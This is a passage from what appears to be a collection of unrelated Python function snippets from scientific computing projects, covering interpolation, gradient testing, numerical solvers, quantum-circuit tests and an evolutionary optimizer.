step)\n\n frames = []\n for pose in render_poses:\n frames.append(\n render_loop(instant_ngp_utils.camera_ray_batch(pose, hwf), rng)[0]\n )\n psnrs_test = [\n -10 * jnp.log10(jnp.mean(jnp.square(rgb - gt)))\n for (rgb, gt) in zip(frames, data[\"images\"])\n ]\n psnr_test = np.array(psnrs_test).mean()\n eval_metrics = EvalMetrics.single_from_model_output(psnr=psnr_test)\n trace_context.next_step()\n eval_info = {\n \"out\": jnp.concatenate([x[None, Ellipsis] for x in frames], axis=0),\n \"gtr\": data[\"images\"],\n }\n return eval_metrics, eval_info", "def test_grad_on_execution(self, mocker):\n dev = qml.device(\"default.qubit\", wires=1)\n spy = mocker.spy(dev, \"execute_and_gradients\")\n\n def cost(a):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return execute(\n [tape],\n dev,\n gradient_fn=\"device\",\n gradient_kwargs={\n \"method\": \"adjoint_jacobian\",\n \"use_device_state\": True,\n },\n )[0]\n\n a = jax.numpy.array([0.1, 0.2])\n jax.jit(cost)(a)\n\n # adjoint method only performs a single device execution, but gets both result and gradient\n assert dev.num_executions == 1\n spy.assert_called()", "def test_make_efuncs(exprs, nfuncs, ntimeiters, nests):\n exprs = list(as_tuple(exprs))\n\n grid = Grid(shape=(10, 10))\n t = grid.stepping_dim # noqa\n x, y = grid.dimensions # noqa\n\n u = Function(name='u', grid=grid) # noqa\n v = TimeFunction(name='v', grid=grid) # noqa\n\n # List comprehension would need explicit locals/globals mappings to eval\n for i, e in enumerate(list(exprs)):\n exprs[i] = eval(e)\n\n op = Operator(exprs)\n\n # We create one ElementalFunction for each Iteration nest over space dimensions\n efuncs = []\n for n, tree in enumerate(retrieve_iteration_tree(op)):\n root = filter_iterations(tree, key=lambda i: i.dim.is_Space)[0]\n efuncs.append(make_efunc('f%d' % n, root))\n\n assert len(efuncs) == len(nfuncs) == len(ntimeiters) == len(nests)\n\n for efunc, nf, nt, nest in zip(efuncs, nfuncs, ntimeiters, nests):\n # Check the `efunc` parameters\n assert all(i in efunc.parameters for i in (x.symbolic_min, x.symbolic_max))\n assert all(i in efunc.parameters for i in (y.symbolic_min, y.symbolic_max))\n functions = FindSymbols().visit(efunc)\n assert len(functions) == nf\n assert all(i in efunc.parameters for i in functions)\n timeiters = [i for i in FindSymbols('basics').visit(efunc)\n if isinstance(i, Dimension) and i.is_Time]\n assert len(timeiters) == nt\n assert all(i in efunc.parameters for i in timeiters)\n assert len(efunc.parameters) == 4 + len(functions) + len(timeiters)\n\n # Check the loop nest structure\n trees = retrieve_iteration_tree(efunc)\n assert len(trees) == 1\n tree = trees[0]\n assert all(i.dim.name == j for i, j in zip(tree, nest))\n\n assert efunc.make_call()", "def eval_func(individual):\n \n tiled = np.tile(individual, (tile_factor, tile_factor))\n return calculate_force_on_sample(tiled, lam_frac_=lambda_factor)", "def FindGrid(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def _evaluate(self, x, y, z):\n if _isscalar(x):\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n beta = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha) * (1 - beta) * 
self.xInterpolators[y_pos - 1][z_pos - 1](x)\n + (1 - alpha) * beta * self.xInterpolators[y_pos - 1][z_pos](x)\n + alpha * (1 - beta) * self.xInterpolators[y_pos][z_pos - 1](x)\n + alpha * beta * self.xInterpolators[y_pos][z_pos](x)\n )\n else:\n m = len(x)\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.y_n):\n for j in range(1, self.z_n):\n c = np.logical_and(i == y_pos, j == z_pos)\n if np.any(c):\n alpha = (y[c] - self.y_list[i - 1]) / (\n self.y_list[i] - self.y_list[i - 1]\n )\n beta = (z[c] - self.z_list[j - 1]) / (\n self.z_list[j] - self.z_list[j - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * self.xInterpolators[i - 1][j - 1](x[c])\n + (1 - alpha) * beta * self.xInterpolators[i - 1][j](x[c])\n + alpha * (1 - beta) * self.xInterpolators[i][j - 1](x[c])\n + alpha * beta * self.xInterpolators[i][j](x[c])\n )\n return f", "def compute_eigvals(*params, **hyperparams):\n phi = params[0]\n d, t = hyperparams[\"dimension\"]\n\n if qml.math.get_interface(phi) == \"tensorflow\":\n phase = qml.math.exp(1j * qml.math.cast_like(phi, 1j))\n minus_phase = qml.math.exp(-1j * qml.math.cast_like(phi, 1j))\n return stack_last([phase if index < d else minus_phase for index in range(t)])\n\n arg = 1j * phi\n prefactors = qml.math.array([1 if index < d else -1 for index in range(t)], like=phi)\n\n if qml.math.ndim(phi) == 0:\n product = arg * prefactors\n else:\n product = qml.math.outer(arg, prefactors)\n return qml.math.exp(product)", "def EvaluateGradient(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def grad_of_evaluate(\n self,\n targets: Optional[jnp.ndarray],\n coefficient_mode: str,\n ) -> Sequence[jnp.ndarray]:\n def evaluate_sum(inputs: Sequence[jnp.ndarray]) -> jnp.ndarray:\n instance = self.copy_with_different_inputs(inputs)\n return jnp.sum(instance.evaluate(targets, coefficient_mode))\n return jax.grad(evaluate_sum)(self.inputs)", "def compute_hessian_vector_product(self, function, arguments):", "def calc(self):\n\t\tfor neuron in self.neurons.items():\n\t\t\tneuron.calculate()", "def efSolver(self):\n dx = self.dh[0] # dx\n dy = self.dh[1] # dy\n dz = self.dh[2] # dz\n \n for i in np.arange(0, self.ni):\n for j in np.arange(0, self.nj):\n for k in np.arange(0, self.nk):\n\n #x-component#\n if i==0: \n # forward\n self.ef[i][j][k][0] = -(-3*self.phi[i][j][k]+\\\n 4*self.phi[i+1][j][k]-\\\n self.phi[i+2][j][k])/(2*dx)\n elif i==self.ni-1: \n # backward\n self.ef[i][j][k][0] = -(self.phi[i-2][j][k]-\\\n 4*self.phi[i-1][j][k]+\\\n 3*self.phi[i][j][k])/(2*dx)\n else: \n #central\n self.ef[i][j][k][0] = -(self.phi[i+1][j][k] - \\\n self.phi[i-1][j][k])/(2*dx)\n\n #y-component\n if j==0:\n self.ef[i][j][k][1] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j+1][k]-\\\n self.phi[i][j+2][k])/(2*dy)\n elif j==self.nj-1:\n self.ef[i][j][k][1] = -(self.phi[i][j-2][k] - \\\n 4*self.phi[i][j-1][k] +\\\n 3*self.phi[i][j][k])/(2*dy)\n else:\n self.ef[i][j][k][1] = -(self.phi[i][j+1][k] - \\\n self.phi[i][j-1][k])/(2*dy)\n\n #z-component\n if k==0:\n self.ef[i][j][k][2] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j][k+1]-\n self.phi[i][j][k+2])/(2*dz)\n elif k==self.nk-1:\n self.ef[i][j][k][2] = -(self.phi[i][j][k-2] - \\\n 4*self.phi[i][j][k-1] + \\\n 3*self.phi[i][j][k])/(2*dz)\n else:\n self.ef[i][j][k][2] = -(self.phi[i][j][k+1] - \\\n 
self.phi[i][j][k-1])/(2*dz)", "def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)", "def __call__(self, x_eval, X_far, X_near, inner_product_far=None):\n\n b = self._compute_b(x_eval, X_far, X_near)\n A = self._compute_A(X_far, X_near)\n Q = self._compute_Q(X_far, X_near, inner_product_far, A)\n\n lamda = self._qp_solver(Q, b)\n\n if np.all(Q @ lamda + b + self._feasibility_eps >= 0):\n return A.T @ lamda\n else:\n None", "def eval_numerical_gradient_array(f, x, df, h=1e-5):\n grad = np.zeros_like(x)\n it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])\n while not it.finished:\n ix = it.multi_index\n\n oldval = x[ix]\n x[ix] = oldval + h\n pos = f(x).copy()\n x[ix] = oldval - h\n neg = f(x).copy()\n x[ix] = oldval\n\n grad[ix] = np.sum((pos - neg) * df) / (2 * h)\n it.iternext()\n return grad", "def compute(self, *args):\n return _ITKCostFunctionsPython.itkMultipleValuedVnlCostFunctionAdaptor_compute(self, *args)", "def _evaluate(self, x, y):\n x_pos, y_pos = self.find_sector(x, y)\n alpha, beta = self.find_coords(x, y, x_pos, y_pos)\n\n # Calculate the function at each point using bilinear interpolation\n f = (\n (1 - alpha) * (1 - beta) * self.f_values[x_pos, y_pos]\n + (1 - alpha) * beta * self.f_values[x_pos, y_pos + 1]\n + alpha * (1 - beta) * self.f_values[x_pos + 1, y_pos]\n + alpha * beta * self.f_values[x_pos + 1, y_pos + 1]\n )\n return f", "def grad_f(self, x, y, z):\n\n str_dfdx = (\"maT * (x-mxT)\"\n \"* exp(-((x-mxT)**2+(y-myT)**2+(z-mzT)**2)/(2*msT**2))\"\n \"/ (msT**2)\")\n dfdx = ne.evaluate(str_dfdx,\n local_dict={'x': x,\n 'y': y,\n 'z': z,\n 'mxT': self.mxT,\n 'myT': self.myT,\n 'mzT': self.mzT,\n 'msT': self.msT,\n 'maT': self.maT})\n str_dfdy = (\"maT * (y-myT)\"\n \"* exp(-((x-mxT)**2+(y-myT)**2+(z-mzT)**2)/(2*msT**2))\"\n \"/ (msT**2)\")\n dfdy = ne.evaluate(str_dfdy,\n local_dict={'x': x,\n 'y': y,\n 'z': z,\n 'mxT': self.mxT,\n 'myT': self.myT,\n 'mzT': self.mzT,\n 'msT': self.msT,\n 'maT': self.maT})\n str_dfdz = (\"maT * (z-mzT)\"\n \"* exp(-((x-mxT)**2+(y-myT)**2+(z-mzT)**2)/(2*msT**2))\"\n \"/ (msT**2)\")\n dfdz = ne.evaluate(str_dfdz,\n local_dict={'x': x,\n 'y': y,\n 'z': z,\n 'mxT': self.mxT,\n 'myT': self.myT,\n 'mzT': self.mzT,\n 'msT': self.msT,\n 'maT': self.maT})\n\n dfdx_sum = np.sum(dfdx, axis=0)\n dfdy_sum = np.sum(dfdy, axis=0)\n dfdz_sum = np.sum(dfdz, axis=0)\n\n return dfdx_sum, dfdy_sum, dfdz_sum", "def evaluationFunction(problem, gFunc, hFunc, node):\n #g = getattr(searchAgents, gFunc)\n #h = getattr(searchAgents, hFunc)\n h = hFunc\n #return g(node) + h(node)\n return gFunc + h(node, problem)", "def test_incorrect_gradients_on_execution(self):\n a = jax.numpy.array([0.1, 0.2])\n\n dev = qml.device(\"default.qubit\", wires=1)\n\n def cost(a, device):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return execute(\n [tape],\n device,\n gradient_fn=param_shift,\n grad_on_execution=True,\n )[0]\n\n with pytest.raises(\n ValueError, match=\"Gradient transforms cannot be used with grad_on_execution=True\"\n ):\n jax.grad(cost)(a, device=dev)", "def _evaluate(self, w, x, y, z):\n if _isscalar(w):\n x_pos = max(min(np.searchsorted(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 
1)\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos - 1](w)\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos](w)\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos][z_pos - 1](w)\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos][z_pos](w)\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos - 1][z_pos - 1](w)\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos][y_pos - 1][z_pos](w)\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos][z_pos - 1](w)\n + alpha * beta * gamma * self.wInterpolators[x_pos][y_pos][z_pos](w)\n )\n else:\n m = len(x)\n x_pos = np.searchsorted(self.x_list, x)\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.x_n):\n for j in range(1, self.y_n):\n for k in range(1, self.z_n):\n c = np.logical_and(\n np.logical_and(i == x_pos, j == y_pos), k == z_pos\n )\n if np.any(c):\n alpha = (x[c] - self.x_list[i - 1]) / (\n self.x_list[i] - self.x_list[i - 1]\n )\n beta = (y[c] - self.y_list[j - 1]) / (\n self.y_list[j] - self.y_list[j - 1]\n )\n gamma = (z[c] - self.z_list[k - 1]) / (\n self.z_list[k] - self.z_list[k - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i - 1][j - 1][k - 1](w[c])\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[i - 1][j - 1][k](w[c])\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[i - 1][j][k - 1](w[c])\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[i - 1][j][k](w[c])\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i][j - 1][k - 1](w[c])\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[i][j - 1][k](w[c])\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[i][j][k - 1](w[c])\n + alpha\n * beta\n * gamma\n * self.wInterpolators[i][j][k](w[c])\n )\n return f", "def eval_numerical_gradient_array(f, x, df, h = 1e-5):\n grad = np.zeros_like(x)\n it = np.nditer(x, flags = ['multi_index'], op_flags =['readwrite'])\n while not it.finished:\n ix = it.multi_index\n \n oldval = x[ix]\n x[ix] = oldval + h\n pos = f(x).copy()\n x[ix] = oldval - h\n neg = f(x).copy()\n x[ix] = oldval\n \n grad[ix] = np.sum((pos - neg) * df) / (2 * h)\n it.iternext()\n return grad", "def build_eval(self, inputs):\n def evaluate_hessian(x):\n return self.Hx(inputs, x) + self.reg_coeff * x\n\n return evaluate_hessian", "def evaluate_(self, inputs):\n log_wks = []\n count = None\n N = self.config['eval_N']\n L = self.config['eval_repeats']\n\n for _ in xrange(N):\n log_wk, count = self.explore_(inputs, L)\n log_wks.append(log_wk)\n\n log_wk = np.concatenate(log_wks, axis=1)\n log_wk_sum = logSumExp(log_wk, axis=1, status='numpy')\n\n nll = np.mean(-(log_wk_sum - np.log(N * L)))\n perplexity = np.exp(np.mean(-(log_wk_sum - np.log(N * L)) / count))\n\n return nll, perplexity", "def __call__ ( self , x , *args ) :\n #\n ## 
1) evaluate the function \n val = self.func_eval ( x , *args )\n #\n ## no uncertainties? \n if isinstance ( x , num_types ) : return VE ( val , 0 )\n # ignore small or invalid uncertanties \n elif 0 >= x.cov2() or iszero ( x.cov2() ) : return VE ( val , 0 )\n #\n ## 2) evaluate the derivative\n dfun = self.__derivative\n d = dfun ( float ( x ) , *args ) \n ## 3) calculate the variance \n cov2 = d * d * x.cov2()\n ## 4) get a final result \n return VE ( val , cov2 )", "def DE(fun,\n run_info,\n dimension,\n max_evals,\n name_output=None,\n run=25,\n replace=True,\n debug=True,\n F=0.6,\n CR=0.9,\n popsize=60,\n crossoverFunction=DEcrossover.classicalBinFunction,\n population=None,\n initial_solution=None):\n assert isinstance(dimension, int), 'dimension should be integer'\n assert (dimension > 0), 'dimension must be positive'\n\n for attr in ['lower', 'upper', 'threshold', 'best']:\n assert attr in run_info.keys(\n ), \"'{}' info not provided for benchmark\".format(attr)\n\n # Added in a array the max evaluations\n if not isinstance(max_evals, list):\n max_evals = [max_evals]\n\n lower = run_info['lower']\n upper = run_info['upper']\n threshold = run_info['threshold']\n fun_best = run_info['best']\n\n PS = popsize\n\n normal_values = {'F': (0.5, 0.3), 'CR': (0.9, 0.1)}\n\n maxEval = max_evals[-1]\n\n if name_output is None:\n fid = None\n else:\n # if it replaced it only return the last value\n if not replace and os.path.isfile(name_output):\n fin = open(name_output, 'rb')\n lines = fin.readlines()\n\n if lines:\n (bestSolutionFitness, bestSol, bestEval,\n evaluations) = lines[-1].split(',')\n return EAresult(\n fitness=bestSolutionFitness,\n solution=bestSol,\n evaluations=evaluations)\n\n fid = open(name_output, 'w')\n\n if isinstance(crossoverFunction, types.FunctionType):\n crossover = DEcrossover.SimpleCrossover(crossoverFunction)\n else:\n crossover = crossoverFunction\n\n currentEval = 0\n bestSolutionFitness = np.Inf\n\n for numrun in range(1, run + 1):\n check_evals = max_evals[:]\n check_eval = check_evals.pop(0)\n valueMutation = get_parameter('F', F, normal_values['F'], PS)\n probabilityRecombination = get_parameter('CR', CR, normal_values['CR'],\n PS)\n\n bestSolution = np.zeros(dimension)\n bestSolutionFitness = np.Inf\n numEvalFound = 0\n sizePopulation = PS\n crossover.initrun(numrun, (lower, upper), maxEval, PS)\n\n currentEval = 0\n\n # Start generating the initial population\n i = 0\n indexBest = 0\n\n if population is not None:\n sizePopulation = population.shape[0]\n else:\n population = np.zeros((sizePopulation, dimension))\n\n for i in range(sizePopulation):\n population[i, :] = np.random.uniform(lower, upper, dimension)\n\n if initial_solution is not None:\n population[0, :] = initial_solution\n\n populationFitness = np.zeros(sizePopulation)\n\n for i in range(sizePopulation):\n populationFitness[i] = fun(population[i, :])\n currentEval += 1\n\n if bestSolutionFitness > populationFitness[i]:\n bestSolutionFitness = populationFitness[i]\n\n bestSolution[:] = population[i, :]\n\n indexBest = i\n numEvalFound = currentEval\n\n msg = \"Best solution Find: %e at %d\" % (bestSolutionFitness,\n currentEval)\n dprint(msg, debug)\n\n while not shouldEnd(currentEval, maxEval, bestSolutionFitness,\n fun_best, threshold):\n # Mutate the current population\n trialVector = np.zeros((sizePopulation, dimension))\n trialVectorFitness = np.zeros(sizePopulation)\n\n for i in range(sizePopulation):\n noisyVector = crossover.apply(population, i, indexBest,\n get_value(valueMutation))\n 
noisyVector = np.clip(noisyVector, lower, upper)\n\n # Obtain the next solution considering probabilityRecombination\n probability = get_value(probabilityRecombination)\n changed = (np.random.rand(dimension) < probability)\n trialVector[\n i] = noisyVector * changed + population[i] * np.invert(\n changed)\n trialVectorFitness[i] = fun(trialVector[i])\n currentEval += 1\n successful = trialVectorFitness[i] < populationFitness[i]\n improvement = populationFitness[i] - trialVectorFitness[i]\n crossover.set_previous_improvement(improvement)\n parameter_result(valueMutation, successful)\n parameter_result(probabilityRecombination, successful)\n\n if successful:\n population[i, :] = trialVector[i, :]\n populationFitness[i] = trialVectorFitness[i]\n\n if populationFitness[i] < bestSolutionFitness:\n\n bestSolution[:] = population[i, :]\n bestSolutionFitness = populationFitness[i]\n\n indexBest = i\n numEvalFound = currentEval\n position = currentEval - sizePopulation + indexBest\n dprint(\"Best solution Find: %e at %d\" %\n (bestSolutionFitness, position), debug)\n\n if fid is not None and currentEval >= check_eval:\n fid.write(\"[%.0e]: %e,%d\\n\" %\n (check_eval, abs(bestSolutionFitness - threshold),\n numEvalFound))\n fid.flush()\n\n if check_evals:\n check_eval = check_evals.pop(0)\n\n # Generation\n\n # Show the best solution ever\n msg = \"The best solution is: %e in %d evaluation %s\" % (\n bestSolutionFitness, numEvalFound, crossover.stats())\n\n dprint(msg, debug)\n\n if fid is not None:\n fid.write(\"%s\\n\" % msg)\n fid.write(\"%e,%s,%d,%d\\n\" % (abs(bestSolutionFitness - threshold),\n ' '.join(map(str, bestSolution)),\n numEvalFound, currentEval))\n fid.flush()\n\n if fid is not None:\n fid.close()\n\n return EAresult(\n fitness=bestSolutionFitness,\n solution=bestSolution,\n evaluations=currentEval)", "def __call__ ( self , args , cor = None ) :\n n = self.N \n assert len ( args ) == n , 'Invalid argument size'\n\n ## get value of the function \n val = self.func ( *args )\n \n c2 = 0\n \n x = n * [ 0 ] ## argument \n g = n * [ 0 ] ## gradient \n \n for i in range ( n ) :\n\n xi = VE ( args[i] )\n x [i] = x \n \n ci = xi.cov2()\n if ci < 0 or iszero ( ci ) : continue\n \n di = self.partial[i] ( *args )\n if iszero ( di ) : continue\n \n ei = xi.error() \n\n g [i] = di \n e [i] = ei\n \n ## diagonal correlation coefficients are assumed to be 1 and ignored! 
\n c2 += ci * di * di\n \n for j in range ( i ) : \n\n xj = x [ j ]\n cj = xj.cov2 () \n if cj < 0 or iszero ( cj ) : continue\n dj = d [ j ]\n if iszero ( dj ) : continue \n ej = e [ j ]\n\n rij = self.__corr ( cor , i , j ) if cor else 0 \n assert -1 <= rij <= 1 or isequal ( abs ( rij ) , 1 ) ,\\\n 'Invalid correlaation coefficient (%d,%d)=%s ' % ( i , j , rij )\n \n c2 += 2.0 * di * dj * rij * ei * ej \n \n return VE ( val , c2 )", "def solve(grid):\n values = grid_values(grid)\n \n values = search(values)\n\n return values", "def solve(grid):\n values = grid_values(grid)\n search(values)\n\n return values", "def eval_Dxy(self):\n\n return self.Xf - self.Yf", "def fCalc(self):\n # A dictionary composed of all internal and boundary points\n allPoints = dict(self.internalPoints.items() + self.boundaryPoints.items())\n\n for pointLabel in allPoints.keys():\n # Compute fE, fW, fN and fW only for internal mesh points\n if allPoints[pointLabel].type.lower() == 'internal':\n xLabel = pointLabel[0]\n yLabel = pointLabel[1]\n x = self.internalPoints[(xLabel,yLabel)].x\n y = self.internalPoints[(xLabel,yLabel)].y\n xE = allPoints[(xLabel + 1,yLabel)].x\n xW = allPoints[(xLabel - 1,yLabel)].x\n yN = allPoints[(xLabel,yLabel + 1)].y\n yS = allPoints[(xLabel,yLabel - 1)].y\n \n if (xE - x)/self.h < -0.000001 or (xE - x)/self.h > 1.000001:\n errorMessage = '**Error! (xE - x)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (xE - x)/h = ' + str((xE - x)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fE = (xE - x)/self.h\n\n # Note that in the following we use -0.000001 and 1.000001 \n # instead of 0 and 1, respectively, to avoid problems with\n # with very small fractions. For example if the fractions is\n # greater than one by 2.22e-16 the condition (x - xW)/self.h > 1\n # will be false and the code returns an error\n if (x - xW)/self.h < -0.000001 or (x - xW)/self.h > 1.000001:\n errorMessage = '**Error! (x - xW)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (x - xW)/h = ' + str((x - xW)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fW = (x - xW)/self.h\n \n if (yN - y)/self.h < -0.000001 or (yN - y)/self.h > 1.000001:\n errorMessage = '**Error! (yN - y)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (yN - y)/h = ' + str((yN - y)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fN = (yN - y)/self.h\n \n if (y - yS)/self.h < -0.000001 or (y - yS)/self.h > 1.000001:\n errorMessage = '**Error! 
(y - yS)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (y - yS)/h = ' + str((y - yS)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fS = (y - yS)/self.h\n \n # Calculate the coeeficients requried to compute the Laplacian \n self.internalPoints[(xLabel,yLabel)].LapCoeffCalc()", "def _evaluate(self, x, y):\n if _isscalar(x):\n f = self.compare([f(x, y) for f in self.functions])\n else:\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n f = self.compare(temp, axis=1)\n return f", "def eval(self, df):\n return self.ev(self.model, df)", "def grid_evaluation(param_list_one, param_list_two, param_eval, n_trials=16, \n aggr_method=np.mean, save_dir='data/', file_name='grid evaluation',\n save_to_disk=True, save_each=1000, chunksize=1.):\n \n \n if not list(param_list_two): # If `param_list_two` is empty\n params = param_list_one\n grid_shape = (len(param_list_one),)\n is_really_grid = False\n \n else:\n params = list(itertools.product(param_list_one, param_list_two))\n grid_shape = (len(param_list_one), len(param_list_two))\n is_really_grid = True\n \n def grid_fun(point): # Function to compute for each grid point\n \n trial_out = np.nan * np.ones((n_trials,))\n \n for i in np.arange(n_trials):\n \n if is_really_grid:\n trial_out[i] = param_eval(point[0], point[1])\n else: # If `param_list_two` is empty\n trial_out[i] = param_eval(point)\n \n return aggr_method(trial_out)\n \n n_grid_pts = len(params)\n \n # Recording procedure\n def record_experiment(grid):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n save_path = save_dir + now + ' ' + file_name + '.pkl'\n experiment = {\n 'date': now,\n 'rows': param_list_one,\n 'cols': param_list_two,\n 'n_trials': n_trials,\n 'grid': np.reshape(grid, grid_shape),\n 'path': save_path\n }\n if save_to_disk:\n utils.save_obj(experiment, save_path)\n return experiment\n \n # Set a pool of workers\n nb_workers = min(mp.cpu_count(), 24)\n print('Working with {} processes.'.format(nb_workers))\n pool = mp.Pool(nb_workers)\n \n # Iterate `grid_fun` across workers\n it = pool.imap(grid_fun, params, chunksize=chunksize)\n grid = np.nan * np.ones((n_grid_pts,))\n\n for idx, val in enumerate(tqdm(it, total=n_grid_pts)):\n grid[idx] = val\n \n # Make sure that we save after each couple of iterations\n if (idx >= save_each) and (idx % save_each == 0): \n experiment = record_experiment(grid)\n \n # Close pool\n pool.close()\n pool.join()\n \n experiment = record_experiment(grid)\n \n return experiment", "def grid_hessian(self, gridaxes):\n assert np.isscalar(self.dim), 'Hessian only implemented for scalar and vector functions'\n assert len(gridaxes) == self.sdim, \"Input has wrong dimension\"\n colloc = [collocation_derivs(self.kvs[i], gridaxes[i], derivs=2) for i in range(self.sdim)]\n\n d = self.sdim\n n_hess = ((d+1)*d) // 2 # number of components in symmetric part of Hessian\n N = tuple(len(g) for g in gridaxes) # shape of tensor grid\n\n # determine size of output array\n if self.dim == 1:\n out_shape = N + (n_hess,)\n else:\n out_shape = N + (self.dim, n_hess)\n hess = np.empty(out_shape, dtype=self.coeffs.dtype)\n\n i_hess = 0\n for i in reversed(range(self.sdim)): # x-component is the last one\n for j in reversed(range(i+1)):\n # compute vector of derivative indices\n D = self.sdim * [0]\n D[i] += 1\n D[j] += 1\n ops = [colloc[k][D[k]] 
for k in range(self.sdim)] # derivatives in directions i,j\n\n if self.dim == 1: # scalar function\n hess[..., i_hess] = apply_tprod(ops, self.coeffs) # D_i D_j (self)\n else: # vector function\n for k in range(self.dim):\n hess[..., k, i_hess] = apply_tprod(ops, self.coeffs[..., k]) # D_i D_j (self[k])\n i_hess += 1\n return hess # shape: shape(grid) x self.dim x n_hess", "def test_grad(self):\r\n for shp0, shp1 in [((1,), (2,)),\r\n ((3,), (1,)),\r\n ((1,), (1,)),\r\n ((3,), (2,)),\r\n ((3, 2), (1, 1)),\r\n ((3, 2), (1, 4)),\r\n ((3, 2), (4, 1)),\r\n ((3, 2), (4, 5)),\r\n ((1, 2), (4, 5)),\r\n ((3, 1), (4, 5)),\r\n ((1, 1), (4, 5)),\r\n ((1, 1), (1, 1)),\r\n ]:\r\n data0 = numpy.random.rand(*shp0).astype(floatX)\r\n data1 = numpy.random.rand(*shp1).astype(floatX)\r\n utt.verify_grad(tensor.outer, [data0, data1])", "def fvm(states: States, grid: Gridlines, topo: Topography, config: Config, runtime: DummyDict):\n # pylint: disable=invalid-name\n\n # calculate source term contributed from topography gradients\n states = topography_gradient(states, topo, config.params.gravity)\n\n # calculate slopes of piecewise linear approximation\n states = minmod_slope(states, grid, config.params.theta, runtime.tol)\n\n # interpolate to get discontinuous conservative quantities at cell faces\n states = get_discontinuous_cnsrv_q(states, grid)\n\n # fix non-physical negative depth\n states = correct_negative_depth(states, topo)\n\n # get non-conservative variables at cell faces\n states = decompose_variables(states, topo, runtime.epsilon)\n\n # get local speed at cell faces\n states = get_local_speed(states, config.params.gravity)\n\n # get discontinuous PDE flux at cell faces\n states = get_discontinuous_flux(states, topo, config.params.gravity)\n\n # get common/continuous numerical flux at cell faces\n states = central_scheme(states, runtime.tol)\n\n # get final right hand side\n states.rhs.w = \\\n (states.face.x.num_flux.w[:, :-1] - states.face.x.num_flux.w[:, 1:]) / grid.x.delta + \\\n (states.face.y.num_flux.w[:-1, :] - states.face.y.num_flux.w[1:, :]) / grid.y.delta + \\\n states.src.w\n\n states.rhs.hu = \\\n 